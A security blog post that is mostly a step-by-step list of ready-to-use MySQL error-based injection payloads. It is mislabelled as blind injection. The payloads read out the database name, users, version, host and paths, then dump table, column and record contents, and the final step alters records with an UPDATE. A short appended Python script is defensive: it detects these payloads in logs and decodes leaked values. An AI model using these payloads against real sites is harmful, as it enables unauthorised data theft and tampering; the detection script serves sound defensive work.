HuuTuan .Info

Sharing Information Security - IT - Graphic Design

Blind SQL Injection

Today I'm sharing a fairly good and complete English-language article on how to exploit Blind SQL Injection.

    1. To test blind injection
    ' and 'x'='x

    2. To select the current database (output will be in hexadecimal; decode it to ASCII)
    ' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    3. To find the current user
    1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    4. To find the MySQL version
    1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    5. To find the current database
    1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    6. To find the system user
    1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    7. To find the hostname
    1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    8. To find the installation directory
    1' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    9. To find the DB user
    1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    10. To find the databases

    Note: Keep incrementing n (n, n+1, n+2, ...) for as long as you keep getting a response.

    1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT n+1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    11. To count the number of tables in the selected database

    Note: Record this count as n.
    Replace the placeholder strings (shown in colour in the original, e.g. hex_code_of_database_name) with the appropriate values.

    1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xhex_code_of_database_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    12. To get the table names in the selected database

    Note: m-n means run this query once for each value from m up to n-1 (m, m+1, ..., n-1).
    Replace the placeholder strings with the appropriate values.

    1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0xhex_code_of_database_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    13. To get the number of columns in the selected table

    Note: Record this count as n.
    Replace the placeholder strings with the appropriate values.

    1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    14. To get the column names of the selected table

    Note: m-n means run this query once for each value from m up to n-1 (m, m+1, ..., n-1).
    Replace the placeholder strings with the appropriate values.

    1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name limit m-n,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    15. To count the number of records in the selected column

    Note: Record this count as n.

    1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `database_name`.table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    16. To fetch records from the selected column

    Note: m-n means run this query once for each value from m up to n-1 (m, m+1, ..., n-1).
    Replace the placeholder strings with the appropriate values.

    1' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(table_name.column_name as char)),0x27,0x7e) FROM `database_name`.table_name LIMIT m-n,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

    17. To update a record in the selected column
    1';UPDATE table_name SET column_name=0xhex_code_of_new_record_value WHERE column_name=0xhex_code_of_old_record_value--
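A defender's-side companion to the list above, added here and not part of the original post. Every query from step 2 onward relies on the same trick: MySQL raises a duplicate-key error on the `group by x` over `floor(rand(0)*2)`, and the error message carries the hex-encoded value wrapped in `~'...'~`. The script below URL-decodes web access log lines and flags that signature, and recovers the ASCII value from the matching `Duplicate entry` line in an application error log, which is what a leaked value looks like to an incident responder. All log lines are constructed samples, not real data.

```python
import re
from typing import List, Optional
from urllib.parse import unquote_plus

# Constructed samples: two access-log requests and one application error line of
# the kind the duplicate-entry technique leaves behind on the server side.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1%27+and(select+1+from'
    '(select+count(*),concat((select+(select+concat(0x7e,0x27,Hex(cast(database()+as+char))'
    ',0x27,0x7e))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+'
    'information_schema.tables+group+by+x)a)+and+%271%27=%271 HTTP/1.1" 500 221',
]
SAMPLE_ERROR_LOG = [
    "[01/Jan/2024 10:00:01] PDOException: SQLSTATE[23000]: "
    "Duplicate entry '~'73686f70'~1' for key 'group_key'",
]

# Request-side indicators of the error-based (duplicate-entry) extraction pattern.
# Matching is done on the URL-decoded line so %27 / + encodings do not hide them.
INDICATORS = [
    r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)",   # the 0/1 collision generator
    r"group\s+by\s+\w+\s*\)\s*\w*\s*\)",                 # ... group by x)a)
    r"information_schema\.",                             # metadata enumeration
    r"concat\s*\(\s*0x7e\s*,\s*0x27",                    # the ~' framing of the leak
    r"hex\s*\(\s*cast\s*\(",                             # hex-encoding of the value
]
INDICATOR_RE = [re.compile(p, re.IGNORECASE) for p in INDICATORS]

# The leaked value appears in the MySQL error as ~'<hex>'~<0|1>.
LEAK_RE = re.compile(r"Duplicate entry '~'([0-9A-Fa-f]+)'~[01]' for key")


def score_request(raw_log_line: str) -> List[str]:
    """Return the indicator patterns found in one URL-decoded access-log line."""
    decoded = unquote_plus(raw_log_line)
    return [p for p, rx in zip(INDICATORS, INDICATOR_RE) if rx.search(decoded)]


def decode_leak(error_line: str) -> Optional[str]:
    """Recover the ASCII value carried by a duplicate-entry error line, if any."""
    m = LEAK_RE.search(error_line)
    if not m:
        return None
    return bytes.fromhex(m.group(1)).decode("ascii", errors="replace")


if __name__ == "__main__":
    for line in SAMPLE_ACCESS_LOG:
        hits = score_request(line)
        print(f"{len(hits)} indicator(s):", line[:60], "...")
    for line in SAMPLE_ERROR_LOG:
        print("leaked value:", decode_leak(line))
```

Two or more indicators on one request is a strong signal; a `Duplicate entry '~'...'~` error in the same second ties the request to the exfiltrated value and tells you which name (here the database name) was read.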
